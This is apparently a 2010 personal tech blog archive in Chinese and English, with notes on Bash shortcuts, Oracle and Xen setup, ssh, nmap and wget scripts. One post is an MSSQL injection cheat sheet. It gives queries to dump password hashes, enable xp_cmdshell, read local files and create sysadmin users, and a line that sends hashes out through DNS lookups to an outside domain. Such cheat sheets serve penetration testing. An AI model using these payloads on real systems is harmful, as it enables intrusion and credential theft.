Thursday, February 25, 2010

Bash Shell Keyboard shortcuts

The following shortcuts work when using default (Emacs) key bindings. Vi-bindings can be enabled by running [cci]set -o vi[/cci].

[cci]Tab ⇆[/cci] : Autocompletes from the cursor position.
[cci]Ctrl+a[/cci] : moves the cursor at the beginning of the line (equivalent to the key [cci]Home[/cci]).
[cci]Ctrl+e[/cci] : (end) moves the cursor at the line end (equivalent to the key [cci]End[/cci]).
[cci]Ctrl+p[/cci] : (previous) recalls the previous command (equivalent to the key [cci]↑[/cci]).
[cci]Ctrl+n[/cci] : (next) recalls the next command (equivalent to the key [cci]↓[/cci]).
[cci]Ctrl+r[/cci] : (research) recalls the last command including the specified character(s). A second [cci]Ctrl+r[/cci] recalls the next anterior command which corresponds to the research
[cci]Ctrl+s[/cci] : Go back to the next more recent command of the research (beware to not execute it from a terminal because this command also launches its XOFF). If you changed that XOFF setting, use [cci]Ctrl+q[/cci] to return.
[cci]Ctrl+o[/cci] : executes the found command from research.
[cci]Ctrl+l[/cci] : clears the screen content (equivalent to the command clear).
[cci]Ctrl+u[/cci] : clears the line content before the cursor and copy it in the clipboard.
[cci]Ctrl+k[/cci] : clears the line content after the cursor and copy it in the clipboard.
[cci]Ctrl+w[/cci] : clears the word before the cursor and copy it in the clipboard.
[cci]Ctrl+y[/cci] : (yank) adds the clipboard content from the cursor position.
[cci]Ctrl+d[/cci] : sends an EOF marker, which (unless disabled by an option) closes the current shell (equivalent to the command exit).
[cci]Ctrl+c[/cci] : sends the signal SIGINT to the current task, which aborts and closes it.
[cci]Ctrl+z[/cci] : sends the signal SIGTSTP to the current task, which suspends it. To return to it later one can enter fg 'process name' (foreground).
[cci]Ctrl+x Ctrl+x[/cci] : (because x has a crossing shape) alternates the cursor with its old position.
[cci]Ctrl+x Ctrl+e[/cci] : (editor because it takes the $EDITOR shell variable) edits the current line in vi.
[cci]Alt+f[/cci] : (forward) moves forward the cursor of one word.
[cci]Alt+b[/cci] : (backward) moves backward the cursor of one word.
[cci]Alt+Del[/cci] : cuts the word before the cursor.
[cci]Alt+d[/cci] : cuts the word after the cursor.
[cci]Alt+u[/cci] : capitalizes every character from the cursor's position to the end of the current word.
[cci]Alt+l[/cci] : lowers the case of every character from the cursor's position to the end of the current word.
[cci]Alt+c[/cci] : capitalizes the character under the cursor and moves to the end of the word.
[cci]Alt+r[/cci] : cancels the changes and put back the line as it was in the history.

Wednesday, February 24, 2010

不停地安装Oracle

今天在Xen上运行了两个2GB内存实例的CentOS5.3虚拟机安装oracle10g, 可是一直出现
Configuration assistant "Oracle Net Configuration Assistant" failed

[cc lang='bash' ] ./runInstaller -silent -ignoreSysPrereqs -responseFile   /home/oracle/database/install/response/ee.rsp[/cc]

我想这是因为网络问题引起监听没有启动,所以,安装完成后直接运行

[cc]/opt/oracle/product/10.2.01/db_1/cfgtoollogs/configToolAllCommands[/cc]

接着在另外一个终端启动监听

[cc]lsnrctl start[/cc]

由于是动态监听.所以要大概30秒之后启动成功,注意是要在 PMON 服务进程启动成功之后才能运行 [cci]lsnrctl start[/cci]. 也就是说要在 [cci]/opt/oracle/product/10.2.01/db_1/cfgtoollogs/configToolAllCommands[/cci] 脚本建立数据库完成,创建实例并成功启动之后,也就是大概脚本运行到80%左右的时候.最后启动 em Web管理.

[cc] emctl start dbconsole[/cc]

EM启动有问题(我就遇到1158的java进程一直defunct状态,但是emangent却起来了),重新建立EM资料库,重新启动服务器.

[cc] emca -config dbcontrol db -repos recreate[/cc]

(*)update

后来发现是因为缺少 libXp.so.6 而不能启动的(我想oracle应该有trace的工具,但是我现在还不知道怎么用,就想gdb或者strace一样?),于是在CentOS5.3上安装了 libXp 的RPM问题解决.

Xen3.0中文手册

http://fred.oracle1.com/~fred/Xen3man/

Logging In to Xen Console After Receiving "xenconsole: Could not open tty" Error

So you try and log in to a domU and xen says it can’t open a tty?
[cc lang="text"]
[tres@calliope ~]$ sudo xm console xen-domu.vm
xenconsole: Could not open tty `/dev/pts/15': No such file or directory
This error normally happens when xenconsoled is no longer running. You can quickly verify by looking for the xenconsoled process:

[tres@calliope ~]$ ps auxwww | grep xenconsoled
[tres@calliope ~]$[/cc]
If you don’t find it, just run
[cc lang="text"]
/etc/init.d/xend start[/cc]

Tuesday, February 23, 2010

Key-Value 系統 分類整理 (NoSQL)

一般使用的 DB 統稱是 RDBMS(MSSQL、MySQL ... 等), 現在因為雲端運算的興起, Key-Value 的系統也漸漸紅了起來, 那到底有哪些 Key-Value system 可以用呢?

此篇文章 A Yes for a NoSQL Taxonomy 主要是這篇 NoSQL is a Horseless Carriage 簡報的整理.

此簡報將 Key-Value 的系統分成幾個類別, 並將這些資料整理出來. (下述內容主要取自簡報, 另外補上 連結 和 簡介.)

註: 下述連結有可能有誤, 有些系統不熟, 若有錯誤麻煩請隨時糾正我. orz.

最完整Html符号大全

Html符号大全

Tuesday, February 9, 2010

MSSQL Injection Cheat Sheet
































































































































VersionSELECT @@version
CommentsSELECT 1 -- comment
SELECT /*comment*/1
Current UserSELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List UsersSELECT name FROM master..syslogins
List Password HashesSELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
List PrivilegesImpossible?
List DBA AccountsTODO
SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try 'bulkadmin', 'systemadmin' and other values from thedocumentation
SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
Current DatabaseSELECT DB_NAME()
List DatabasesSELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
List ColumnsSELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
List TablesSELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
Find Tables From Column Name-- NB: This example works only for the current database.  If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
Select Nth RowSELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row
Select Nth CharSELECT substring('abcd', 3, 1) -- returns c
Bitwise ANDSELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0
ASCII Value -> CharSELECT char(0x41) -- returns A
Char -> ASCII ValueSELECT ascii('A') - returns 65
CastingSELECT CAST('1' as int);
SELECT CAST(1 as char)
String ConcatenationSELECT 'A' + 'B' - returns AB
If StatementIF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
Avoiding QuotesSELECT char(65)+char(66) -- returns AB
Time DelayWAITFOR DELAY '0:0:5' -- pause for 5 seconds
Make DNS Requestsdeclare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000

declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005

-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.
-- Also check out theDNS tunnel feature of sqlninja
Command ExecutionEXEC xp_cmdshell 'net user'; -- priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv
Local File AccessCREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;
Hostname, IP AddressSELECT HOST_NAME()
Create UsersEXEC sp_addlogin 'user', 'pass'; -- priv
Drop UsersEXEC sp_droplogin 'user'; -- priv
Make User DBAEXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv
Location of DB filesTODO

Use nmap scan FTP server how to

[cc lang="bash"]nmap -p T:21 -T4 -A -n 172.16.95.0-255[/cc]

Sunday, February 7, 2010

How to keep alive with ssh server

[cc lang="bash"]ssh -o TCPKeepAlive fred@oracle1.com[/cc]

or add follw to your [cci]$HOME/.ssh/config[/cci] file

[cc]ServerAliveInterval 60[/cc]

Friday, February 5, 2010

Download file use bash script and wget

[cc lang="bash"]
#!/bin/sh
DOWN_DIR=/home/fred/example.com/upload/
while read line
#c=1
do
#c=`expr $c + 1`
#echo -e "$line \n"
file1=`echo -e $line| awk -F" " '{ print $1 }'`
file2=`echo -e $line| awk -F" " '{ print $2 }'`
dir1=$DOWN_DIR`echo $file2| awk -F"/" '{ print $1"/"$2 }'`
mkdir -p $dir1
wget $file1 -O $DOWN_DIR${file2}.jpg
#if [ $c -lt 3 ];then
#exit
#fi
done < "/home/fred/src/db.txt"
[/cc]

Linux下查看内存条数命令

[cc lang="bash"]$ dmidecode |grep -A16  "Memory Device$"[/cc]

Oracle Workforce Development Program

Oracle Workforce Development Program 简称WDP,中文为“甲骨文职业发展计划”,目的在于让更多的非专业DBA拿到OCP认证,目前WDP在国内大力推广,在重庆我也报名了。15天的课程被压缩到12天(每天多上几个小时?)。价格为10700,优惠为10350。但是今天却有人说(免费给C-BASE广告一下):

重庆ORACLE WDP_suki(1142980521) 2010-2-4 11:25:15

ORACLE WDP西南中心和成都高新区合作.如公司在高新区注册及办公的公司员工学习OCP原厂培训三门课程+三门考试+1K的原厂教材仅需5350元...详情咨询023-78563505 刘小姐

QQ客服-1142980521

我头都气大了,1W的费用降为5000,我靠这不是变向降价吗,要不是冲着OCP的国际认证,我真的要置疑WDP的含金量,其实这也反应出成都市在科技方面的投入,而重庆政府呢?大家都看得到。

Wednesday, February 3, 2010

Hello Oracle One

今天把从2006开始的BLOG迁移到了DH上面,域名换成了Oracle1.com。因为我现在已经是Oracle的fans了 ;)

JAVAMYSQL,再到LINUX,乃至根本的ORACLE DATABASE。都是我的研究方向,因为他们都属于ORACLE的业务!

Oracle One, This is!